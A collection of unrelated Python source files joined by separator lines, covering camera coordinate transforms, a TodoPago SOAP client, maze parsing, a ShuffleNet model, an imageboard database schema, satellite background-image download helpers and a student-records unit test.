cam3d_centroid = self.world2cam3d(world['centroid'])
campix = {
'center': self.cam3d2pix(cam3d_centroid),
'size': size,
'dis': backend.linalg.norm(cam3d_centroid, axis=-1),
'depth': cam3d_centroid[..., -1],
'ori': self.basis2ori(world['basis'], world['centroid'])
}
else:
campix = self.cam3d2pix(self.world2cam3d(world))
return campix
@staticmethod
def homotrans(M, p):
if isinstance(M, torch.Tensor):
if p.shape[-1] == M.shape[1] - 1:
p = torch.cat([p, torch.ones_like(p[..., :1], device=p.device)], -1)
if p.dim() <= 2:
p = p.unsqueeze(-2)
p = torch.matmul(M, p.transpose(-1, -2)).transpose(-1, -2).squeeze(-2)
return p[..., :-1] / p[..., -1:]
else:
return homotrans(M, p)
@staticmethod
def obj2frame(obj, bdb3d):
"""
Transform 3D points or Trimesh from normalized object coordinate frame to coordinate frame bdb3d is in.
object: x-left, y-back, z-up (defined by iGibson)
world: right-hand coordinate of iGibson (z-up)
Parameters
----------
obj: n x 3 numpy array or Trimesh
bdb3d: dict, self['objs'][id]['bdb3d']
Returns
-------
n x 3 numpy array or Trimesh
"""
if isinstance(obj, trimesh.Trimesh):
obj = obj.copy()
normalized_vertices = normalize_to_unit_square(obj.vertices, keep_ratio=False)[0]
obj_vertices = normalized_vertices / 2
obj.vertices = IGTransform.obj2frame(obj_vertices, bdb3d)
return obj
if isinstance(obj, torch.Tensor):
size = bdb3d['size'].unsqueeze(-2)
centroid = bdb3d['centroid'].unsqueeze(-2)
return (bdb3d['basis'] @ (obj * size).transpose(-1, -2)).transpose(-1, -2) + centroid
else:
return (bdb3d['basis'] @ (obj * bdb3d['size']).T).T + bdb3d['centroid']
@staticmethod
def frame2obj(point, bdb3d):
return (bdb3d['basis'].T @ (point - bdb3d['centroid']).T).T / bdb3d['size']
def obj2cam3d(self, obj, bdb3d):
return self.world2cam3d(self.obj2frame(obj, bdb3d))
def cam3d2obj(self, cam3d, bdb3d):
return self.frame2obj(self.cam3d2world(cam3d), bdb3d)
def __getitem__(self, item):
value = self.camera[item]
if self.split == 'layout':
return value
if isinstance(value, torch.Tensor) and self.data \
and self.split in self.data and 'split' in self.data[self.split].keys():
expanded = []
for t, s in zip(value, self.data[self.split]['split']):
expanded.append(t.unsqueeze(0).expand([s[1] - s[0]] + list(t.shape)))
return torch.cat(expanded)
return value
def in_cam(self, point, frame='world'):
if frame == 'world':
point = self.world2cam3d(point)
depth = point[..., -1]
point = self.cam3d2pix(point)
elif frame == 'cam3d':
depth = point[..., -1]
point = self.cam3d2pix(point)
elif frame != 'campix':
raise NotImplementedError
in_cam = np.all(
(point <= np.array([self.camera['width'], self.camera['height']]) - 0.5)
& (point >= -0.5), axis=-1
)
if frame in ('world', 'cam3d'):
in_cam = (depth > 0) & in_cam
return in_cam
def rotate_layout_like_total3d(self, layout_bdb3d):
# Rotate the forward vector of layout (by pi/2),
# to make its dot product (with camera forward vector) to be maximal.
layout_front = bdb3d_axis(layout_bdb3d)
cam_front = cam_axis(self.camera)
rot_90 = np.array([[0, 1, 0], [-1, 0, 0], [0, 0, 1]])
rot_matrices = [np.linalg.matrix_power(rot_90, i) for i in range(4)]
rotated_layout_fronts = [rot @ layout_front for rot in rot_matrices]
dot_products = [f @ cam_front for f in rotated_layout_fronts]
i_rot = np.argmax(dot_products)
rot_matrix = rot_matrices[i_rot]
layout = {
'centroid': layout_bdb3d['centroid'].copy(),
'size': np.abs(rot_matrix) @ layout_bdb3d['size'],
'basis': rot_matrix @ layout_bdb3d['basis']
}
return layout
|
from zeep import Client, Settings
from zeep.cache import SqliteCache
from zeep.transports import Transport
wsdl = "python_todopago/wsdl/Authorize.wsdl"
ENDPOINTS = {
True: "https://developers.todopago.com.ar/services/t/1.1/",
False: "https://apis.todopago.com.ar/services/t/1.1/",
}
def get_client(token: str, sandbox: bool = False) -> Client:
endpoiont = ENDPOINTS[sandbox]
settings = Settings(extra_http_headers={"Authorization": token})
transport = Transport(cache=SqliteCache(timeout=86400))
client = Client(
endpoiont + "Authorize?wsdl",
settings=settings,
transport=transport,
)
client.service._binding_options["address"] = endpoiont + "Authorize"
return client
|
#global variables for modules
#node labels
user_label = "User"
#relationship types
request_rel_type = "REQUESTED"
friend_rel_type = "FRIENDS"
#node property keys
time_key = "Time"
name_key = "Name"
mekid_key = "Mekid"
#node property values
no_network_value = 0
#relationship properties
req_accept = "accept"
req_decline = "decline"
#networks
fb_key = "Facebook"
twit_key = "Twitter"
ig_key = "Instagram"
sc_key = "Snapchat"
networks = [fb_key, twit_key, ig_key, sc_key]
#REST API
#rest api json return keys
json_type = "type"
json_msg = "msg"
#rest api json return values
json_error = "Error"
json_success = "OK"
#errors
unknown_error_message = "Something went wrong! Please try again later."
|
class Maze:
class Node:
def __init__(self, position):
self.Position = position
self.Neighbours = [None, None, None, None]
#self.Weights = [0, 0, 0, 0]
def __init__(self, im):
width = im.width
height = im.height
data = list(im.getdata(0))
self.start = None
self.end = None
# Top row buffer
topnodes = [None] * width
count = 0
# Start row
for x in range (1, width - 1):
if data[x] > 0:
self.start = Maze.Node((0,x))
topnodes[x] = self.start
count += 1
break
for y in range (1, height - 1):
#print ("row", str(y)) # Uncomment this line to keep a track of row progress
rowoffset = y * width
rowaboveoffset = rowoffset - width
rowbelowoffset = rowoffset + width
# Initialise previous, current and next values
prv = False
cur = False
nxt = data[rowoffset + 1] > 0
leftnode = None
for x in range (1, width - 1):
# Move prev, current and next onwards. This way we read from the image once per pixel, marginal optimisation
prv = cur
cur = nxt
nxt = data[rowoffset + x + 1] > 0
n = None
if cur == False:
# ON WALL - No action
continue
if prv == True:
if nxt == True:
# PATH PATH PATH
# Create node only if paths above or below
if data[rowaboveoffset + x] > 0 or data[rowbelowoffset + x] > 0:
n = Maze.Node((y,x))
leftnode.Neighbours[1] = n
n.Neighbours[3] = leftnode
leftnode = n
else:
# PATH PATH WALL
# Create path at end of corridor
n = Maze.Node((y,x))
leftnode.Neighbours[1] = n
n.Neighbours[3] = leftnode
leftnode = None
else:
if nxt == True:
# WALL PATH PATH
# Create path at start of corridor
n = Maze.Node((y,x))
leftnode = n
else:
# WALL PATH WALL
# Create node only if in dead end
if (data[rowaboveoffset + x] == 0) or (data[rowbelowoffset + x] == 0):
#print ("Create Node in dead end")
n = Maze.Node((y,x))
# If node isn't none, we can assume we can connect N-S somewhere
if n != None:
# Clear above, connect to waiting top node
if (data[rowaboveoffset + x] > 0):
t = topnodes[x]
t.Neighbours[2] = n
n.Neighbours[0] = t
# If clear below, put this new node in the top row for the next connection
if (data[rowbelowoffset + x] > 0):
topnodes[x] = n
else:
topnodes[x] = None
count += 1
# End row
rowoffset = (height - 1) * width
for x in range (1, width - 1):
if data[rowoffset + x] > 0:
self.end = Maze.Node((height - 1,x))
t = topnodes[x]
t.Neighbours[2] = self.end
self.end.Neighbours[0] = t
count += 1
break
self.count = count
self.width = width
self.height = height
|
KEYBOARD = {
'0': ' ',
'1': '',
'2': 'abc',
'3': 'def',
'4': 'ghi',
'5': 'jkl',
'6': 'mno',
'7': 'pqrs',
'8': 'tuv',
'9': 'wxyz'}
class Solution:
"""
@param digits: A digital string
@return: all posible letter combinations
@ DFS Time: O(4^n) , Space (4^n + n)
"""
def letterCombinations(self, digits):
if not digits:
return []
results = []
self.dfs(digits, 0, [], results)
return results
def dfs(self, digits, index, chars, results):
if index == len(digits):
results.append(''.join(chars))
return
for letter in KEYBOARD[digits[index]]:
chars.append(letter)
self.dfs(digits, index + 1, chars, results)
chars.pop()
|
from interpreter.CopperInterpreter import *
|
#!/bin/env python
##
# Copyright(c) 2010-2015 Intel Corporation.
# Copyright(c) 2016-2018 Viosoft Corporation.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Intel Corporation nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
##
class SystemConfig:
_user = None
_ip = None
_proxDir = None
_cfgFile = None
def __init__(self, user, ip, proxDir, configDir):
self._user = user;
self._ip = ip;
self._proxDir = proxDir;
self._cfgFile = configDir;
def __init__(self, text):
self._user = text.split("@")[0];
text = text.split("@")[1];
self._ip = text.split(":")[0];
self._proxDir = text.split(":")[1];
self._cfgFile = text.split(":")[2];
def getUser(self):
return self._user;
def getIP(self):
return self._ip;
def getProxDir(self):
return self._proxDir;
def getCfgFile(self):
return self._cfgFile;
@staticmethod
def checkSyntax(text):
split = text.split("@");
if (len(split) != 2):
return SystemConfig.getSyntaxError(text);
after = split[1].split(":");
if (len(after) != 3):
return SystemConfig.getSyntaxError(text);
return ""
def toString(self):
ret = "";
ret += " " + self._user + "@" + self._ip + "\n"
ret += " " + "prox dir: " + self._proxDir + "\n"
ret += " " + "cfg dir: " + self._cfgFile + "\n"
return ret;
@staticmethod
def getSyntaxError(text):
ret = "Invaild system syntax"
ret += ", got: " + str(text)
ret += ", expected: " + str(SystemConfig.expectedSyntax())
return ret;
@staticmethod
def expectedSyntax():
return "user@ip:proxDir:cfgFile"
|
import config, config_defaults
from sqlalchemy import create_engine
from sqlalchemy import Table, Column, Integer, Text, String, MetaData
from sqlalchemy.orm import sessionmaker, scoped_session
from sqlalchemy.sql import func
# needed by other modules
from sqlalchemy.exc import OperationalError
pool_opts = {}
if config.SQL_POOLING:
pool_opts = {
'pool_size': config.SQL_POOL_SIZE,
'max_overflow': config.SQL_POOL_MAX_OVERFLOW,
}
engine = create_engine(config.SQL_ENGINE, **pool_opts)
Session = scoped_session(sessionmaker(bind=engine))
metadata = MetaData()
_boards = {}
def board(name):
'''Generates board table objects'''
if name in _boards:
return _boards[name]
table = Table(name, metadata,
Column("num", Integer, primary_key=True), # Post number, auto-increments
Column("parent", Integer), # Parent post for replies in threads. For original posts, must be set to 0 (and not null)
Column("timestamp", Integer), # Timestamp in seconds for when the post was created
Column("lasthit", Integer), # Last activity in thread. Must be set to the same value for BOTH the original post and all replies!
Column("ip", Text), # IP number of poster, in integer form!
Column("date", Text), # The date, as a string
Column("name", Text(convert_unicode=True)), # Name of the poster
Column("trip", Text), # Tripcode (encoded)
Column("email", Text(convert_unicode=True)), # Email address
Column("subject", Text(convert_unicode=True)), # Subject
Column("password", Text), # Deletion password (in plaintext)
Column("comment", Text(convert_unicode=True)), # Comment text, HTML encoded.
Column("image", Text(convert_unicode=True)), # Image filename with path and extension (IE, src/1081231233721.jpg)
Column("size", Integer), # File size in bytes
Column("md5", Text), # md5 sum in hex
Column("width", Integer), # Width of image in pixels
Column("height", Integer), # Height of image in pixels
Column("thumbnail", Text), # Thumbnail filename with path and extension
Column("tn_width", Text), # Thumbnail width in pixels
Column("tn_height", Text), # Thumbnail height in pixels
Column("lastedit", Text), # ADDED - Date of previous edit, as a string
Column("lastedit_ip", Text), # ADDED - Previous editor of the post, if any
Column("admin_post", Text), # ADDED - Admin post?
# TODO: Probably should make this Boolean. Keeping as int for now to maintain compatibility with sorting functions.
Column("stickied", Integer), # ADDED - Stickied?
Column("locked", Text) # ADDED - Locked?
)
table.create(bind=engine, checkfirst=True)
_boards[name] = table
return _boards[name]
admin = Table(config.SQL_ADMIN_TABLE, metadata,
Column("num", Integer, primary_key=True), # Entry number, auto-increments
Column("type", Text), # Type of entry (ipban, wordban, etc)
Column("comment", Text(convert_unicode=True)), # Comment for the entry
Column("ival1", Text), # Integer value 1 (usually IP)
Column("ival2", Text), # Integer value 2 (usually netmask)
Column("sval1", Text), # String value 1
Column("total", Text), # ADDED - Total Ban?
Column("expiration", Integer) # ADDED - Ban Expiration?
)
proxy = Table(config.SQL_PROXY_TABLE, metadata,
Column("num", Integer, primary_key=True), # Entry number, auto-increments
Column("type", Text), # Type of entry (black, white, etc)
Column("ip", Text), # IP address
Column("timestamp", Integer), # Age since epoch
Column("date", Text) # Human-readable form of date
)
account = Table(config.SQL_ACCOUNT_TABLE, metadata,
Column("username", String(25), primary_key=True), # Name of user--must be unique
Column("account", Text, nullable=False), # Account type/class: mod, globmod, admin
Column("password", Text, nullable=False), # Encrypted password
Column("reign", Text), # List of board (tables) under jurisdiction: globmod and admin have global power and are exempt
Column("disabled", Integer) # Disabled account?
)
activity = Table(config.SQL_STAFFLOG_TABLE, metadata,
Column("num", Integer, primary_key=True), # ID
Column("username", String(25), nullable=False), # Name of moderator involved
Column("action", Text), # Action performed: post_delete, admin_post, admin_edit, ip_ban, ban_edit, ban_remove
Column("info", Text), # Information
Column("date", Text), # Date of action
Column("ip", Text), # IP address of the moderator
Column("admin_id", Integer), # For associating certain entries with the corresponding key on the admin table
Column("timestamp", Integer) # Timestamp, for trimming
)
common = Table(config.SQL_COMMON_SITE_TABLE, metadata,
Column("board", String(25), primary_key=True), # Name of comment table
Column("type", Text) # Corresponding board type? (Later use)
)
report = Table(config.SQL_REPORT_TABLE, metadata,
Column("num", Integer, primary_key=True), # Report number, auto-increments
Column("board", String(25), nullable=False), # Board name
Column("reporter", Text, nullable=False), # Reporter's IP address (decimal encoded)
Column("offender", Text), # IP Address of the offending poster. Why the form-breaking redundancy with SQL_TABLE? If a post is deleted by the perpetrator, the trace is still logged. :)
Column("postnum", Integer, nullable=False), # Post number
Column("comment", Text(convert_unicode=True),
nullable=False), # Mandated reason for the report.
Column("timestamp", Integer), # Timestamp in seconds for when the post was created
Column("date", Text), # Date of the report
Column("resolved", Integer) # Is it resolved? (1: yes 0: no)
)
backup = Table(config.SQL_BACKUP_TABLE, metadata,
Column("num", Integer, primary_key=True), # Primary key, auto-increments
Column("board_name", String(25), nullable=False), # Board name
Column("postnum", Integer), # Post number
Column("parent", Integer), # Parent post for replies in threads. For original posts, must be set to 0 (and not null)
Column("timestamp", Integer), # Timestamp in seconds for when the post was created
Column("lasthit", Integer), # Last activity in thread. Must be set to the same value for BOTH the original post and all replies!
Column("ip", Text), # IP number of poster, in integer form!
Column("date", Text), # The date, as a string
Column("name", Text(convert_unicode=True)), # Name of the poster
Column("trip", Text), # Tripcode (encoded)
Column("email", Text), # Email address
Column("subject", Text(convert_unicode=True)), # Subject
Column("password", Text), # Deletion password (in plaintext)
Column("comment", Text(convert_unicode=True)), # Comment text, HTML encoded.
Column("image", Text(convert_unicode=True)), # Image filename with path and extension (IE, src/1081231233721.jpg)
Column("size", Integer), # File size in bytes
Column("md5", Text), # md5 sum in hex
Column("width", Integer), # Width of image in pixels
Column("height", Integer), # Height of image in pixels
Column("thumbnail", Text), # Thumbnail filename with path and extension
Column("tn_width", Text), # Thumbnail width in pixels
Column("tn_height", Text), # Thumbnail height in pixels
Column("lastedit", Text), # ADDED - Date of previous edit, as a string
Column("lastedit_ip", Text), # ADDED - Previous editor of the post, if any
Column("admin_post", Text), # ADDED - Admin post?
Column("stickied", Integer), # ADDED - Stickied?
Column("locked", Text), # ADDED - Locked?
Column("timestampofarchival", Integer) # When was this backed up?
)
passprompt = Table(config.SQL_PASSPROMPT_TABLE, metadata,
Column("id", Integer, primary_key=True),
Column("host", Text),
Column("task", String(25)),
Column("boardname", String(25)),
Column("post", Integer),
Column("timestamp", Integer),
Column("passfail", Integer)
)
class Page(object):
'''Pagination class: Given an SQL query and pagination information,
produce only the relevant rows. N.B.: The board.Board class uses
different pagination logic.'''
def __init__(self, query, page_num, per_page):
assert str(page_num).isdigit() and page_num > 0,\
'Invalid page number.'
assert str(per_page).isdigit() and per_page > 0,\
'Invalid page entry count.'
self.num = page_num
if per_page > 200:
self.per_page = 200
else:
self.per_page = per_page
self.offset = (page_num - 1) * self.per_page
session = Session()
count = query.column(func.count())
self.total_entries = session.execute(count).fetchone()['count_1']
row_proxies = session.execute(query.limit(per_page)\
.offset(self.offset))
self.rows = [dict(row.items()) for row in row_proxies]
self.total_pages = (self.total_entries + self.per_page - 1)\
/ self.per_page
if self.total_pages == 0:
self.total_pages = 1
if self.total_pages < self.num:
self.num = self.total_pages
# Quick fix for 'board' -> 'board_name' column renaming.
if self.rows:
ren_board = 'board' in self.rows[0].keys()
row_ctr = row_cycle = 1
for row in self.rows:
row_cycle ^= 0x3
row['rowtype'] = row_cycle
row['entry_number'] = row_ctr
if ren_board:
row['board_name'] = row['board']
|
import tensorflow as tf
import math
from .CONSTANTS import BATCH_NORM_MOMENTUM, N_SHUFFLE_UNITS, FIRST_STRIDE
def _channel_shuffle(X, groups):
height, width, in_channels = X.shape.as_list()[1:]
in_channels_per_group = int(in_channels/groups)
# reshape
shape = tf.stack([-1, height, width, groups, in_channels_per_group])
X = tf.reshape(X, shape)
# transpose
X = tf.transpose(X, [0, 1, 2, 4, 3])
# reshape
shape = tf.stack([-1, height, width, in_channels])
X = tf.reshape(X, shape)
return X
def _mapping(
X, is_training, num_classes=200,
groups=3, dropout=0.5,
complexity_scale_factor=0.75):
"""A ShuffleNet implementation.
Arguments:
X: A float tensor with shape [batch_size, image_height, image_width, 3].
is_training: A boolean, whether the network is in the training mode.
num_classes: An integer.
groups: An integer, number of groups in group convolutions,
only possible values are: 1, 2, 3, 4, 8.
dropout: A floar number, dropout rate before the last linear layer.
complexity_scale_factor: A floar number, to customize the network
to a desired complexity you can apply a scale factor,
in the original paper they are considering
scale factor values: 0.25, 0.5, 1.0.
It determines the width of the network.
Returns:
A float tensor with shape [batch_size, num_classes].
"""
# 'out_channels' equals to second stage's number of output channels
if groups == 1:
out_channels = 144
elif groups == 2:
out_channels = 200
elif groups == 3:
out_channels = 240
elif groups == 4:
out_channels = 272
elif groups == 8:
out_channels = 384
# all 'out_channels' are divisible by corresponding 'groups'
# if you want you can decrease network's width
out_channels = int(out_channels * complexity_scale_factor)
with tf.variable_scope('features'):
with tf.variable_scope('stage1'):
with tf.variable_scope('conv1'):
result = _conv(X, 24, kernel=3, stride=FIRST_STRIDE)
result = _batch_norm(result, is_training)
result = _nonlinearity(result)
# in the original paper they are not using batch_norm and relu here
result = _max_pooling(result)
with tf.variable_scope('stage2'):
with tf.variable_scope('unit1'):
result = _first_shufflenet_unit(
result, is_training, groups, out_channels
)
for i in range(N_SHUFFLE_UNITS[0]):
with tf.variable_scope('unit' + str(i + 2)):
result = _shufflenet_unit(result, is_training, groups)
# number of channels in 'result' is out_channels
with tf.variable_scope('stage3'):
with tf.variable_scope('unit1'):
result = _shufflenet_unit(result, is_training, groups, stride=2)
for i in range(N_SHUFFLE_UNITS[1]):
with tf.variable_scope('unit' + str(i + 2)):
result = _shufflenet_unit(result, is_training, groups)
# number of channels in 'result' is 2*out_channels
with tf.variable_scope('stage4'):
with tf.variable_scope('unit1'):
result = _shufflenet_unit(result, is_training, groups, stride=2)
for i in range(N_SHUFFLE_UNITS[2]):
with tf.variable_scope('unit' + str(i + 2)):
result = _shufflenet_unit(result, is_training, groups)
# number of channels in 'result' is 4*out_channels
with tf.variable_scope('classifier'):
result = _global_average_pooling(result)
result = _dropout(result, is_training, dropout)
# in the original paper they are not using dropout here
logits = _affine(result, num_classes)
return logits
def _nonlinearity(X):
return tf.nn.relu(X, name='ReLU')
def _dropout(X, is_training, rate=0.5):
keep_prob = tf.constant(
1.0 - rate, tf.float32,
[], 'keep_prob'
)
result = tf.cond(
is_training,
lambda: tf.nn.dropout(X, keep_prob),
lambda: tf.identity(X),
name='dropout'
)
return result
def _batch_norm(X, is_training):
return tf.layers.batch_normalization(
X, scale=False, center=True,
momentum=BATCH_NORM_MOMENTUM,
training=is_training, fused=True
)
def _global_average_pooling(X):
return tf.reduce_mean(
X, axis=[1, 2],
name='global_average_pooling'
)
def _max_pooling(X):
return tf.nn.max_pool(
X, [1, 3, 3, 1], [1, 2, 2, 1], 'SAME',
name='max_pooling'
)
def _avg_pooling(X):
return tf.nn.avg_pool(
X, [1, 3, 3, 1], [1, 2, 2, 1], 'SAME',
name='avg_pooling'
)
def _conv(X, filters, kernel=3, stride=1):
in_channels = X.shape.as_list()[-1]
# kaiming uniform initialization
maxval = math.sqrt(6.0/in_channels)
K = tf.get_variable(
'kernel', [kernel, kernel, in_channels, filters],
tf.float32, tf.random_uniform_initializer(-maxval, maxval)
)
b = tf.get_variable(
'bias', [filters], tf.float32,
tf.zeros_initializer()
)
return tf.nn.bias_add(
tf.nn.conv2d(X, K, [1, stride, stride, 1], 'SAME'), b
)
def _group_conv(X, filters, groups, kernel=1, stride=1):
in_channels = X.shape.as_list()[3]
in_channels_per_group = int(in_channels/groups)
filters_per_group = int(filters/groups)
# kaiming uniform initialization
maxval = math.sqrt(6.0/in_channels_per_group)
K = tf.get_variable(
'kernel', [kernel, kernel, in_channels_per_group, filters],
tf.float32, tf.random_uniform_initializer(-maxval, maxval)
)
# split channels
X_channel_splits = tf.split(X, [in_channels_per_group]*groups, axis=3)
K_filter_splits = tf.split(K, [filters_per_group]*groups, axis=3)
results = []
# do convolution for each split
for i in range(groups):
X_split = X_channel_splits[i]
K_split = K_filter_splits[i]
results += [tf.nn.conv2d(X_split, K_split, [1, stride, stride, 1], 'SAME')]
return tf.concat(results, 3)
def _depthwise_conv(X, kernel=3, stride=1):
in_channels = X.shape.as_list()[3]
# kaiming uniform initialization
maxval = math.sqrt(6.0/in_channels)
W = tf.get_variable(
'depthwise_kernel', [kernel, kernel, in_channels, 1],
tf.float32, tf.random_uniform_initializer(-maxval, maxval)
)
return tf.nn.depthwise_conv2d(X, W, [1, stride, stride, 1], 'SAME')
def _shufflenet_unit(X, is_training, groups=3, stride=1):
in_channels = X.shape.as_list()[3]
result = X
with tf.variable_scope('g_conv_1'):
result = _group_conv(result, in_channels, groups)
result = _batch_norm(result, is_training)
result = _nonlinearity(result)
with tf.variable_scope('channel_shuffle_2'):
result = _channel_shuffle(result, groups)
with tf.variable_scope('dw_conv_3'):
result = _depthwise_conv(result, stride=stride)
result = _batch_norm(result, is_training)
with tf.variable_scope('g_conv_4'):
result = _group_conv(result, in_channels, groups)
result = _batch_norm(result, is_training)
if stride < 2:
result = tf.add(result, X)
else:
X = _avg_pooling(X)
result = tf.concat([result, X], 3)
result = _nonlinearity(result)
return result
# first shufflenet unit is different from the rest
def _first_shufflenet_unit(X, is_training, groups, out_channels):
in_channels = X.shape.as_list()[3]
result = X
out_channels -= in_channels
with tf.variable_scope('g_conv_1'):
result = _group_conv(result, out_channels, groups=1)
result = _batch_norm(result, is_training)
result = _nonlinearity(result)
with tf.variable_scope('dw_conv_2'):
result = _depthwise_conv(result, stride=2)
result = _batch_norm(result, is_training)
with tf.variable_scope('g_conv_3'):
result = _group_conv(result, out_channels, groups)
result = _batch_norm(result, is_training)
X = _avg_pooling(X)
result = tf.concat([result, X], 3)
result = _nonlinearity(result)
return result
def _affine(X, size):
input_dim = X.shape.as_list()[1]
# kaiming uniform initialization
maxval = math.sqrt(6.0/input_dim)
W = tf.get_variable(
'kernel', [input_dim, size], tf.float32,
tf.random_uniform_initializer(-maxval, maxval)
)
b = tf.get_variable(
'bias', [size], tf.float32,
tf.zeros_initializer()
)
return tf.nn.bias_add(tf.matmul(X, W), b)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This file is part of CbM (https://github.com/ec-jrc/cbm).
# Author : Konstantinos Anastasakis
# Credits : GTCAP Team
# Copyright : 2021 European Commission, Joint Research Centre
# License : 3-Clause BSD
import os
import json
import glob
from os.path import join, normpath, exists, isfile
from cbm.utils import spatial_utils, config
def by_location(aoi, year, lon, lat, chipsize=512, extend=512,
tms=['Google'], axis=True, debug=False):
"""Download the background image with parcels polygon overlay by selected
location. This function will get an image from the center of the polygon.
Examples:
from cbm.view import background
background.by_location(aoi, lon, lat, 512, 512, 'Google',
True, True)
Arguments:
aoi, the area of interest (str)
year, the year of parcels table
lon, lat, longitude and latitude in decimal degrees (float).
chipsize, size of the chip in pixels (int).
extend, size of the chip in meters (float).
tms, tile map server Google or Bing (str).
debug, print or not procedure information (Boolean).
"""
get_requests = data_source()
if type(tms) is str:
tms = [tms]
try:
json_data = json.loads(get_requests.ploc(aoi, year, lon, lat,
True, False, debug))
if type(json_data['ogc_fid']) is list:
pid = json_data['ogc_fid'][0]
else:
pid = json_data['ogc_fid']
workdir = normpath(join(config.get_value(['paths', 'temp']),
aoi, str(year), str(pid)))
if debug:
print('pid: ', pid)
print('workdir: ', workdir)
print('json_data: ', json_data)
json_file = normpath(join(workdir, 'info.json'))
os.makedirs(workdir, exist_ok=True)
if not isfile(json_file):
with open(json_file, "w") as f:
json.dump(json_data, f)
except Exception as err:
workdir = normpath(join(config.get_value(['paths', 'temp']), aoi,
str(year), f'_{lon}_{lat}'.replace('.', '_')))
if debug:
print("No parcel information found.", err)
bg_path = normpath(join(workdir, 'backgrounds'))
os.makedirs(bg_path, exist_ok=True)
with open(f"{bg_path}/chipsize_extend_{chipsize}_{extend}", "w") as f:
f.write('')
if debug:
print('bg_path: ', bg_path)
print('lon, lat:', lon, lat)
for t in tms:
if debug:
print('lon, lat, chipsize, extend, t, bg_path, debug')
print(lon, lat, chipsize, extend, t, bg_path, debug)
get_requests.background(lon, lat, chipsize, extend, t, bg_path, debug)
def by_pid(aoi, year, pid, chipsize=512, extend=512,
tms=['Google'], axis=True, debug=False):
"""Download the background image with parcels polygon overlay by selected
location.
Examples:
from cbm.view import background
background.by_pid(aoi, pid, 512, 512, 'Google',
True, True)
Arguments:
aoi, the area of interest (str)
year, the year of parcels table
pid, the parcel id (str).
chipsize, size of the chip in pixels (int).
extend, size of the chip in meters (float).
tms, tile map server Google or Bing (str).
debug, print or not procedure information (Boolean).
"""
get_requests = data_source()
if type(tms) is str:
tms = [tms]
workdir = normpath(join(config.get_value(['paths', 'temp']),
aoi, str(year), str(pid)))
if debug:
print('workdir: ', workdir)
json_file = normpath(join(workdir, 'info.json'))
if not isfile(json_file):
json_data = json.loads(get_requests.pid(aoi, year, pid,
None, True, False, debug))
os.makedirs(workdir, exist_ok=True)
with open(json_file, "w") as f:
json.dump(json_data, f)
else:
with open(json_file, 'r') as f:
json_data = json.load(f)
lon = json_data['clon'][0]
lat = json_data['clat'][0]
bg_path = normpath(join(workdir, 'backgrounds'))
os.makedirs(bg_path, exist_ok=True)
with open(f"{bg_path}/chipsize_extend_{chipsize}_{extend}", "w") as f:
f.write('')
if debug:
print('bg_path: ', bg_path)
print('lon, lat:', lon, lat)
for t in tms:
if debug:
print('lon', 'lat', 'chipsize', 'extend', 't', 'bg_path', 'debug')
print(lon, lat, chipsize, extend, t, bg_path, debug)
get_requests.background(lon, lat, chipsize, extend, t, bg_path, debug)
def data_source():
source = config.get_value(['set', 'data_source'])
if source == 'api':
from cbm.datas import api
return api
elif source == 'direct':
from cbm.datas import direct
return direct
|
# -*- coding: utf-8 -*-
"""
Created on Sun Oct 27 04:12:53 2019
@author: Sumit Gupta
@CWID : 10441745
"""
import unittest
from HW11_Sumit_Gupta import file_reading_gen, Repository, main
class TestRepository(unittest.TestCase):
"""
Class to test all the methods in HW09_Sumit_Gupta.py
"""
def test_stevens_info(self):
"""
Test if all the content of the file are loaded correctly or not
"""
stevens = Repository('Test',False)
students_info = {'10103': ['10103', 'Jobs, S', 'SFEN', {'SSW 810': 'A-', 'CS 501':'B'}],
'10115': ['10115', 'Bezos, J', 'SFEN', {'SSW 810': 'A', 'CS 546': 'F'}],
'10183': ['10183', 'Musk, E', 'SFEN', {'SSW 555': 'A', 'SSW 810': 'A'}],
'11714': ['11714', 'Gates, B', 'CS', {'SSW 810': 'B-', 'CS 546': 'A','CS 570': 'A-'}]
}
instructors_info = {'98764': ['98764', 'Cohen, R', 'SFEN', {'CS 546': 1}],
'98763': ['98763', 'Rowland, J', 'SFEN', {'SSW 810': 4, 'SSW 555': 1}],
'98762': ['98762', 'Hawking, S', 'CS', {'CS 501': 1, 'CS 546': 1, 'CS 570': 1}]}
majors_info = {'SFEN': ['SFEN', ('SSW 540', 'SSW 555', 'SSW 810'),('CS 501', 'CS 546')],
'CS': ['CS', ('SYS 800', 'SYS 612', 'SYS 671'),('SSW 565', 'SSW 810')]}
students_dic = dict()
for cwid, student in stevens.students.items():
students_dic[cwid] = student.get_whole_info()
instructors_dic = dict()
for cwid, instructor in stevens.instructors.items():
instructors_dic[cwid] = instructor.get_whole_info()
majors_dic = dict()
for major, major_info in stevens.majors.items():
majors_dic[major] = major_info.get_whole_info()
self.assertEqual(students_dic, students_info)
self.assertEqual(instructors_dic, instructors_info)
for item, major in majors_dic.items():
self.assertEqual(major[0], majors_info[item][0])
self.assertTrue(major[1], majors_info[item][1])
self.assertTrue(major[2], majors_info[item][2])
def test_student_courses_info(self):
"""
Test student successfully completed courses, remaining required courses and electives
"""
stevens = Repository('Test',False)
